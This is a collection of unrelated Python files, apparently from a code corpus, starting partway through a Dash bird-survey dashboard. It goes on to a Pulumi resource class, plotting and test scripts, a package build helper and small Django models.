anno_text = [f'<b>{n}</b>' if n > 0 else ' ' for n in values]
if not empty_plot:
data += [go.Scatter(x = [max(values) * 0.05] * 5,
y = [1,2,3,4,5],
text=anno_text,
mode = 'text',
textposition="middle right",
textfont=dict(
color='white',
family='Noto Sans TC',
size=14),
hoverinfo='none')]
if empty_plot:
layout = go.Layout(
annotations=[go.layout.Annotation(x=0.5, y=3,xref="x",yref="y",
text="NO DATA YET!",showarrow=False,
font=dict(family='Noto Sans TC',size=32)
)],
margin=dict(l=0,r=0,b=0,t=0),
dragmode = False,
xaxis=dict(range=[0,1],showticklabels=False,showgrid=False,zeroline=False),
yaxis=dict(showticklabels=False,showgrid=False,zeroline=False),
showlegend=False,
font=dict(family='Noto Sans TC'),
plot_bgcolor='rgba(0,0,0,0)',
paper_bgcolor='rgba(0,0,0,0)',)
else:
layout = go.Layout(shapes = [go.layout.Shape(type="line",x0= max(values) * -0.1,x1=max(values) * -0.1,y0=1,y1=5)],
margin=dict(l=0,r=0,b=0,t=0),
dragmode = False,
xaxis=dict(range=[max(values) * -0.75, max(values)],
tickvals = [0, int(max(values) / 2), max(values)],
showgrid=False,zeroline=False),
yaxis=dict(showticklabels=False,showgrid=False,zeroline=False),
showlegend=False,
font=dict(family='Noto Sans TC'),
plot_bgcolor='rgba(0,0,0,0)',
paper_bgcolor='rgba(0,0,0,0)',
)
fig = go.Figure(data=data, layout=layout)
return fig
def bar1_content(team, w):
if datetime.date.today() < datetime.date(2020, 10, 1):
creators = Survey.objects.filter(team='黑面琵鷺隊', is_valid=True).values_list('creator', flat=True)
else:
creators = Survey.objects.filter(team=teams[team], is_valid=True).values_list('creator', flat=True)
ucreators = list(set(creators))
ns = [] #number of species
for c in ucreators:
raw_species_list = SurveyObs.objects.filter(survey__creator=c, survey__is_valid=True).values_list('species_name', flat=True)
ns.append(len(set([re.sub(r' ?\(.*?\)', '', s) for s in raw_species_list])))
ns_c = sorted(zip(ns,ucreators))[::-1] #tuple of (number of species, creator)
return html.Div([
dbc.Row([
dbc.Col(html.Div('上傳鳥種數排名',className='bar_title'),md=7),
],align='baseline', className='pt-2'),
html.Hr(),
dcc.Graph(figure=draw_bar([i[0] for i in ns_c[0:5]], [i[1] for i in ns_c[0:5]], w),config=dict(displayModeBar=False),className='bar_style'),
html.Hr()
])
def bar2_content(team, w):
if datetime.date.today() < datetime.date(2020, 10, 1):
creators = Survey.objects.filter(team='黑面琵鷺隊', is_valid=True).values_list('creator', flat=True)
else:
creators = Survey.objects.filter(team=teams[team], is_valid=True).values_list('creator', flat=True)
ucreators = list(set(creators))
ta = [] #total amount
for c in ucreators:
ta.append(sum(SurveyObs.objects.filter(survey__creator=c, survey__is_valid=True).values_list('amount', flat=True)))
ta_c = sorted(zip(ta,ucreators))[::-1] #tuple of (total amount, creator)
return html.Div([
dbc.Row([
dbc.Col(html.Div('上傳鳥隻數排名',className='bar_title'),md=7),
],align='baseline', className='pt-2'),
html.Hr(),
dcc.Graph(figure=draw_bar([i[0] for i in ta_c[0:5]], [i[1] for i in ta_c[0:5]], w),config=dict(displayModeBar=False),className='bar_style'),
html.Hr()
])
def bar3_content(team, w):
if datetime.date.today() < datetime.date(2020, 10, 1):
creators = Survey.objects.filter(team='黑面琵鷺隊', is_valid=True).values_list('creator', flat=True)
else:
creators = Survey.objects.filter(team=teams[team], is_valid=True).values_list('creator', flat=True)
ucreators = list(set(creators))
tl = [] #total list
for c in ucreators:
tl.append(len(Survey.objects.filter(creator=c, is_valid=True).values_list('checklist_id', flat=True)))
    tl_c = sorted(zip(tl,ucreators))[::-1] #tuple of (number of checklists, creator)
return html.Div([
dbc.Row([
dbc.Col(html.Div('上傳清單數排名',className='bar_title'),md=7),
],align='baseline', className='pt-2'),
html.Hr(),
dcc.Graph(figure=draw_bar([i[0] for i in tl_c[0:5]], [i[1] for i in tl_c[0:5]], w),config=dict(displayModeBar=False),className='bar_style'),
html.Hr()
])
app.layout = html.Div([
dbc.Row([
dbc.Col(className='img_flex_center',md=3,id='team_thumbnail'),
dbc.Col([
dbc.Row([
dbc.Col(md=6, id='team_datatable'),
dbc.Col(dcc.Graph(id='team_map',figure=empty_map(),config=dict(displayModeBar=False)),md=6),
],),
dbc.Row([
dbc.Col(md=4, id='bar1'),
dbc.Col(md=4, id='bar2'),
dbc.Col(md=4, id='bar3'),
], className='bar_card')
],md=9)
], className=''),
dcc.Location(id='url'),
html.Div('',id='empty',style={'display':'none'})
], className='dashboard_container', id='team_container')
app.clientside_callback(
"""
function(path) {
console.log(path)
return path+',' + String(window.innerWidth) + ',' + String(window.innerHeight);
}
""",
Output('empty', 'children'),
[Input('url', 'pathname')]
)
@app.callback(
[Output('team_thumbnail', 'children'),
Output('team_datatable', 'children'),
Output('team_map', 'figure'),
Output('bar1', 'children'),
Output('bar2', 'children'),
Output('bar3', 'children'),],
[Input('empty', 'children')], prevent_initial_call = True
)
def on_page_load(init_info):
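    # `init_info` is the "pathname,innerWidth,innerHeight" string produced by the
    # clientside callback above; the pathname selects which team to render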
path = init_info.split(',')[0]
w = int(init_info.split(',')[1])
h = int(init_info.split(',')[2])
if (path.split('/')[-2]) == 'team3':
return team_thumbnail_content(2), team_datatable(2, w), team_map(2, w), bar1_content(2, w), bar2_content(2, w), bar3_content(2, w)
if (path.split('/')[-2]) == 'team2':
return team_thumbnail_content(1), team_datatable(1, w), team_map(1, w), bar1_content(1, w), bar2_content(1, w), bar3_content(1, w)
return team_thumbnail_content(0), team_datatable(0, w), team_map(0, w), bar1_content(0, w), bar2_content(0, w), bar3_content(0, w)
|
python
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
from .. import utilities, tables
class Lien(pulumi.CustomResource):
def __init__(__self__, __name__, __opts__=None, origin=None, parent=None, reason=None, restrictions=None):
"""Create a Lien resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, str):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if not origin:
raise TypeError('Missing required property origin')
__props__['origin'] = origin
if not parent:
raise TypeError('Missing required property parent')
__props__['parent'] = parent
if not reason:
raise TypeError('Missing required property reason')
__props__['reason'] = reason
if not restrictions:
raise TypeError('Missing required property restrictions')
__props__['restrictions'] = restrictions
__props__['create_time'] = None
__props__['name'] = None
super(Lien, __self__).__init__(
'gcp:resourcemanager/lien:Lien',
__name__,
__props__,
__opts__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
python
|
from glob import glob
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
def main():
file = "./cpp/tests/bin/Distribution_bucket_0_15_08_2021.dat"
df = pd.read_csv(
file, delim_whitespace=True, header=None, names=["id", "x", "px", "y", "py", "t", "delta"]
)
df["turn"] = df.groupby("id").cumcount() + 1
dfg = df.groupby("turn")
emitfile = "./cpp/tests/bin/CTE_Emittances_0_15_08_2021.dat"
dfe = pd.read_csv(
emitfile, delim_whitespace=True, header=None, names=["id", "ex", "ey", "sigs", "sige"]
)
plt.ion()
fig = plt.figure(constrained_layout=True, figsize=(14, 10))
# create plot grid
gs = fig.add_gridspec(2, 4)
# create subplots and set titles
ax1 = fig.add_subplot(gs[0, 0])
ax2 = fig.add_subplot(gs[0, 1])
ax3 = fig.add_subplot(gs[0, 2:])
ax4 = fig.add_subplot(gs[1, 0])
ax5 = fig.add_subplot(gs[1, 1])
ax6 = fig.add_subplot(gs[1, 2])
ax7 = fig.add_subplot(gs[1, 3])
ax1.set_title(r"$x-p_x$ init")
ax2.set_title(r"$y-p_y$ init")
ax3.set_title(r"$t-d\gamma$ init")
ax4.set_title(r"L ip1")
ax5.set_title(r"L ip2")
ax6.set_title(r"L ip5")
ax7.set_title(r"L ip8")
ex_plot = ax4.plot([], [], marker=".", linestyle="-")[0]
ey_plot = ax5.plot([], [], marker=".", linestyle="-")[0]
sigs_plot = ax6.plot([], [], marker=".", linestyle="-")[0]
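    # replay the tracking data turn by turn: scatter the transverse and
    # longitudinal phase space for each turn and append the horizontal/vertical
    # emittances and bunch length to the running line plots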
for turn, g in dfg:
ax1.scatter(g["x"], g["px"], s=3)
ax2.scatter(g["y"], g["py"], s=3)
ax3.scatter(g["t"].values, g["delta"].values, s=3)
ex_plot.set_xdata(np.append(ex_plot.get_xdata(), [turn]))
ex_plot.set_ydata(np.append(ex_plot.get_ydata(), [dfe.loc[dfe["id"] == turn - 1, "ex"]]))
ey_plot.set_xdata(np.append(ey_plot.get_xdata(), [turn]))
ey_plot.set_ydata(np.append(ey_plot.get_ydata(), [dfe.loc[dfe["id"] == turn - 1, "ey"]]))
sigs_plot.set_xdata(np.append(sigs_plot.get_xdata(), [turn]))
sigs_plot.set_ydata(
np.append(sigs_plot.get_ydata(), [dfe.loc[dfe["id"] == turn - 1, "sigs"]])
)
plt.draw()
ax1.set_xlim(-0.001, 0.001)
ax2.set_xlim(-0.001, 0.001)
ax3.set_xlim(0, 1.5e-9)
ax1.set_ylim(-0.001, 0.001)
ax2.set_ylim(-0.001, 0.001)
ax3.set_ylim(-1e-2, 1e-2)
ax4.set_xlim(0, 100)
ax4.set_ylim(0, 1e-8)
ax5.set_xlim(0, 100)
ax5.set_ylim(0, 1e-9)
ax6.set_xlim(0, 100)
ax6.set_ylim(0, 1e-2)
ax7.set_xlim(0, 100)
plt.pause(0.1)
ax1.cla()
ax2.cla()
ax3.cla()
# plt.show()
plt.ioff()
if __name__ == "__main__":
main()
|
python
|
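# integer division by repeated subtraction: for positive inputs, the loop
# subtracts the divisor until the remainder is smaller than it, then prints
# the remainder followed by the quotient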
dividendo=int(input("Dividendo es: "))
divisor=int(input("Divisor es: "))
if dividendo>0 and divisor>0:
coc=0
residuo=dividendo
while (residuo>=divisor):
residuo-=divisor
coc+=1
print(residuo)
print(coc)
|
python
|
from __future__ import unicode_literals
from sideboard.lib import mainloop
if __name__ == '__main__':
mainloop()
|
python
|
import json
from helper import OuraModel, from_json
class UserInfo(OuraModel):
_KEYS = ['age', 'weight', 'gender', 'email']
if __name__ == '__main__':
test = """
{
"age": 27,
"weight": 80,
"email": "[email protected]",
"surprise" : "wow this is new"
}"""
u = from_json(test, UserInfo)
print(u)
|
python
|
# Date: 05/10/2018
# Author: Pure-L0G1C
# Description: Wrapper for gimme object
from .gimme import Gimme
class Wrapper(object):
def __init__(self, kwargs):
self.gimme = Gimme(kwargs)
@property
def start(self):
self.gimme.start()
@property
def stop(self):
self.gimme.stop()
@property
def get(self):
return self.gimme.proxies.get()
@property
def size(self):
return self.gimme.proxies.lsize
|
python
|
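# concatenate a list of strings into a single string; equivalent to ''.join(lst)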
def implode(lst):
s = ""
for e in lst:
s = s+e
return s
print(implode(['h', 'e', 'l', 'l', 'o']))
|
python
|
# Generated by Django 3.2.3 on 2021-05-21 21:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cities', '0002_phone'),
]
operations = [
migrations.RenameField(
model_name='phone',
old_name='phone_model',
new_name='model',
),
]
|
python
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os.path
import warnings
import shutil
import json
import tests.test_helpers as th
import submission_validator
class TestSubmissionValidatorValidateDetections(th.ExtendedTestCase):
def test_errors_for_missing_label_probs(self):
with self.assertRaises(KeyError) as cm:
submission_validator.validate_detections([{
# 'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_label_probs_wrong_length(self):
with self.assertRaises(KeyError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=6, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_warns_for_label_probs_ignored(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
submission_validator.validate_detections([{
'label_probs': [0.01, 0.01, 0.01, 0.01, 0.02],
'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assertEqual(1, len(w))
self.assertTrue(issubclass(w[-1].category, UserWarning))
self.assert_contains_indexes(str(w[-1].message), 'test.json', 13, 0)
def test_warns_for_label_probs_normalized(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.5, 0.5, 0.2],
'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assertEqual(1, len(w))
self.assertTrue(issubclass(w[-1].category, UserWarning))
self.assert_contains_indexes(str(w[-1].message), 'test.json', 13, 0)
def test_errors_for_missing_bbox(self):
with self.assertRaises(KeyError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2]
# 'bbox': [12, 14, 55, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_bbox_wrong_size(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46, 47]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_bbox_xmax_less_than_xmin(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [55, 14, 12, 46]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_bbox_ymax_less_than_ymin(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 46, 55, 14]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_invalid_cov(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[1, 0], [0, 1]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
    def test_errors_for_asymmetric_cov(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [3, 4]], [[1, 0], [0, 1]]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[5, 6], [7, 8]]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def test_errors_for_non_positive_definite_cov(self):
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [2, 1]], [[1, 0], [0, 1]]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
with self.assertRaises(ValueError) as cm:
submission_validator.validate_detections([{
'label_probs': [0.1, 0.1, 0.1, 0.1, 0.2],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 2], [2, 1]]]
}], [list(range(5)), list(range(5))], num_classes=5, img_idx=13, sequence_name='test.json')
self.assert_contains_indexes(str(cm.exception), 'test.json', 13, 0)
def assert_contains_indexes(self, msg, sequence_name, img_num, det_idx):
self.assertIn(str(sequence_name), msg)
self.assertIn(str(img_num), msg)
self.assertIn(str(det_idx), msg)
class TestSubmissionValidatorValidateSequence(th.ExtendedTestCase):
temp_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'temp')
def tearDown(self):
if os.path.isdir(self.temp_dir):
shutil.rmtree(self.temp_dir)
def make_sequence(self, detections):
os.makedirs(self.temp_dir, exist_ok=True)
json_file = os.path.join(self.temp_dir, 'test.json')
patch_classes(detections)
with open(json_file, 'w') as fp:
json.dump({
'classes': submission_validator.CLASSES,
'detections': detections
}, fp)
return json_file
def test_errors_contain_correct_image_numbers(self):
detections = [
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}],
[],
[],
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}, {
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [2, 1]], [[1, 0], [0, 1]]]
}],
]
sequence_json = self.make_sequence(detections)
with self.assertRaises(ValueError) as cm:
submission_validator.validate_sequence(sequence_json)
msg = str(cm.exception)
self.assertIn(os.path.basename(sequence_json), msg)
self.assertIn('3', msg)
self.assertIn('1', msg)
def test_errors_if_classes_missing(self):
detections = [
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}],
[],
[],
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}, {
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [2, 1]], [[1, 0], [0, 1]]]
}],
]
patch_classes(detections)
os.makedirs(self.temp_dir, exist_ok=True)
json_file = os.path.join(self.temp_dir, 'test.json')
with open(json_file, 'w') as fp:
json.dump({
# 'classes': submission_validator.CLASSES,
'detections': detections
}, fp)
with self.assertRaises(KeyError) as cm:
submission_validator.validate_sequence(json_file)
msg = str(cm.exception)
self.assertIn('test.json', msg)
def test_errors_if_detections_missing(self):
os.makedirs(self.temp_dir, exist_ok=True)
json_file = os.path.join(self.temp_dir, 'test.json')
with open(json_file, 'w') as fp:
json.dump({
'classes': submission_validator.CLASSES,
# 'detections': detections
}, fp)
with self.assertRaises(KeyError) as cm:
next(submission_validator.validate_sequence(json_file))
msg = str(cm.exception)
self.assertIn('test.json', msg)
def test_errors_if_no_valid_classes(self):
detections = [
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}],
[],
[],
[{
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 0], [0, 1]], [[1, 0], [0, 1]]]
}, {
'label_probs': [0.1, 0.2, 0.3, 0.4],
'bbox': [12, 14, 55, 46],
'covars': [[[1, 2], [2, 1]], [[1, 0], [0, 1]]]
}],
]
patch_classes(detections)
os.makedirs(self.temp_dir, exist_ok=True)
json_file = os.path.join(self.temp_dir, 'test.json')
with open(json_file, 'w') as fp:
json.dump({
'classes': [str(idx) for idx in range(len(submission_validator.CLASSES))],
'detections': detections
}, fp)
with self.assertRaises(ValueError) as cm:
next(submission_validator.validate_sequence(json_file))
msg = str(cm.exception)
self.assertIn('test.json', msg)
class TestSubmissionLoaderReadSubmission(th.ExtendedTestCase):
temp_dir = os.path.join(os.path.dirname(__file__), 'temp')
def tearDown(self):
if os.path.isdir(self.temp_dir):
shutil.rmtree(self.temp_dir)
def make_submission(self, detections_map, subfolder=None):
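        # write one '<sequence_name>.json' file per entry of detections_map,
        # optionally under a subfolder, mimicking a submission directory layout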
root = self.temp_dir
if subfolder is not None:
root = os.path.join(self.temp_dir, subfolder)
os.makedirs(root, exist_ok=True)
for sequence_name, detections in detections_map.items():
json_file = os.path.join(root, '{0}.json'.format(sequence_name))
patch_classes(detections)
with open(json_file, 'w') as fp:
json.dump({
'classes': submission_validator.CLASSES,
'detections': detections
}, fp)
def test_raises_error_if_directory_doesnt_exist(self):
not_a_dir = os.path.join(self.temp_dir, 'not', 'a', 'dir')
with self.assertRaises(ValueError) as cm:
submission_validator.validate_submission(not_a_dir)
msg = str(cm.exception)
self.assertIn(not_a_dir, msg)
def test_raises_error_if_missing_sequences(self):
all_idx = set(range(18))
excluded = {3, 4, 5, 13, 17}
self.make_submission({'{0:06}'.format(idx): [] for idx in all_idx - excluded})
with self.assertRaises(ValueError) as cm:
submission_validator.validate_submission(self.temp_dir)
msg = str(cm.exception)
for idx in excluded:
self.assertIn('{0:06}'.format(idx), msg)
def test_raises_error_if_duplicate_sequence(self):
self.make_submission({'{0:06}'.format(idx): [] for idx in range(18)}, 'folder_a')
self.make_submission({'000000': []}, 'folder_b')
with self.assertRaises(ValueError) as cm:
submission_validator.validate_submission(self.temp_dir)
msg = str(cm.exception)
self.assertIn('folder_a/000000.json', msg)
self.assertIn('folder_b/000000.json', msg)
def test_no_error_if_testing_subset(self):
all_idx = set(range(18))
excluded = {3, 4, 5, 13, 17}
subset = [idx for idx in all_idx - excluded]
self.make_submission({'{0:06}'.format(idx): [] for idx in subset})
submission_validator.validate_submission(self.temp_dir, sequence_ids=[idx for idx in subset])
def test_raise_error_if_missing_sequence_in_subset(self):
all_idx = set(range(18))
excluded = {3, 4, 5, 13, 17}
subset = [idx for idx in all_idx - excluded]
self.make_submission({'{0:06}'.format(idx): [] for idx in subset[:-1]})
with self.assertRaises(ValueError) as cm:
submission_validator.validate_submission(self.temp_dir,
sequence_ids=subset)
msg = str(cm.exception)
self.assertIn('{0:06}'.format(16), msg)
def patch_classes(detections):
# Patch the label probabilities to be the right length
for img_dets in detections:
for det in img_dets:
if len(det['label_probs']) < len(submission_validator.CLASSES):
det['label_probs'] = make_probs(det['label_probs'])
def make_probs(probs):
full_probs = [0.0] * len(submission_validator.CLASSES)
full_probs[0:len(probs)] = probs
return full_probs
|
python
|
import requests
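# toggle between the paragraph-style payload (nounphrases + entity page
# paragraphs) and the entity-substring payload sent to the same endpoint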
use_paragraphs = True
def main():
url = "http://0.0.0.0:8100/model"
if use_paragraphs:
request_data = [
{
"human_sentences": ["Who played Sheldon Cooper in The Big Bang Theory?"],
"dialog_history": ["Who played Sheldon Cooper in The Big Bang Theory?"],
"nounphrases": [["Sheldon Cooper", "The Big Bang Theory"]],
"entity_pages": [
[
[
"Sheldon Lee Cooper is a fictional character in the CBS television series "
"The Big Bang Theory."
],
[
"The Big Bang Theory is an American television sitcom created by Chuck "
"Lorre and Bill Prady"
],
]
],
},
{
"human_sentences": ["What is the capital of Germany?"],
"dialog_history": ["What is the capital of Germany?"],
"nounphrases": [["the capital", "Germany"]],
"entity_pages": [[["Germany is a country in Central Europe."]]],
},
{"human_sentences": ["/alexa_stop_handler."], "dialog_history": [""], "nounphrases": [[]]},
{"human_sentences": [" "], "dialog_history": [""], "nounphrases": [[]]},
]
else:
request_data = [
{
"human_sentences": ["Who played Sheldon Cooper in The Big Bang Theory?"],
"dialog_history": ["Who played Sheldon Cooper in The Big Bang Theory?"],
"entity_substr": [["Sheldon Cooper", "The Big Bang Theory"]],
"entity_pages": [[["Sheldon Cooper"], ["The Big Bang Theory"]]],
},
{
"human_sentences": ["What is the capital of Germany?"],
"dialog_history": ["What is the capital of Germany?"],
"entity_substr": [["the capital", "Germany"]],
"entity_pages": [[["Capital"], ["Germany"]]],
},
{"human_sentences": ["/alexa_stop_handler."], "dialog_history": [""], "entity_substr": [[]]},
{"human_sentences": [" "], "dialog_history": [""], "entity_substr": [[]]},
]
gold_results = [
[
"Sheldon Lee Cooper is a fictional character in the CBS television series The Big Bang Theory.",
"The Big Bang Theory is an American television sitcom created by Chuck Lorre and Bill Prady",
],
["Germany is a country in Central Europe."],
[],
[],
]
count = 0
for data, gold_result in zip(request_data, gold_results):
result = requests.post(url, json=data).json()
if result[0]["facts"] == gold_result:
count += 1
else:
print(f"Got {result}, but expected: {gold_result}")
assert count == len(request_data)
print("Success")
if __name__ == "__main__":
main()
|
python
|
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import platform
from subprocess import run
def is_macos():
"""
:return: True if system is MacOS, False otherwise
"""
return platform.system() == 'Darwin'
def is_windows():
"""
:return: True if system is Windows, False otherwise
"""
return platform.system() == 'Windows'
def is_linux():
"""
    :return: True if system is Linux, False otherwise
"""
return platform.system() == 'Linux'
PROJECT_DIR = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__))))
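# make src/code_generator importable so VERSION (used for the wheel filename) can be read below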
sys.path.append(os.path.abspath(os.path.join(PROJECT_DIR, "src", "code_generator")))
from version import VERSION
PYTHON = "python3"
PIP = "pip3"
if is_macos() or is_linux():
PYTHON = "python3"
PIP = "pip3"
elif is_windows():
PYTHON = "python"
PIP = "pip"
def uninstall_wheel():
"""
    pip uninstall -y code-generator
"""
run([PIP, 'uninstall', '-y', 'code-generator'])
def build_wheel():
"""
python.exe -m pip install --upgrade pip
python.exe -m pip install --upgrade build
python.exe -m build
"""
run([PYTHON, '-m', 'pip', 'install', '--upgrade', 'pip'])
run([PYTHON, '-m', 'pip', 'install', '--upgrade', 'build'])
run([PYTHON, '-m', 'build'])
def install_wheel():
"""
    pip install ./dist/code_generator-{VERSION}-py3-none-any.whl
"""
wheel_path = os.path.join(PROJECT_DIR, 'dist', 'code_generator-{}-py3-none-any.whl'.format(VERSION))
run([PIP, 'install', wheel_path])
def main():
parser = argparse.ArgumentParser(description='Command-line params')
parser.add_argument('--mode',
                        help='What to do with the package',
choices=["build", "install", "reinstall", "uninstall"],
default="reinstall",
required=False)
args = parser.parse_args()
if args.mode == "build":
build_wheel()
elif args.mode == "install":
build_wheel()
install_wheel()
elif args.mode == "reinstall":
uninstall_wheel()
build_wheel()
install_wheel()
elif args.mode == "uninstall":
uninstall_wheel()
else:
print("Unknown mode")
return 0
if __name__ == '__main__':
sys.exit(main())
|
python
|
from django.db import models
# Create your models here.
class SigninModel(models.Model):
username = models.CharField(max_length=10)
password = models.CharField(max_length=50)
class BookTicketModel(models.Model):
post = models.CharField(max_length=10)
class AdjustTicketModel(models.Model):
post = models.CharField(max_length=10)
class CancelTicketModel(models.Model):
post = models.CharField(max_length=10)
|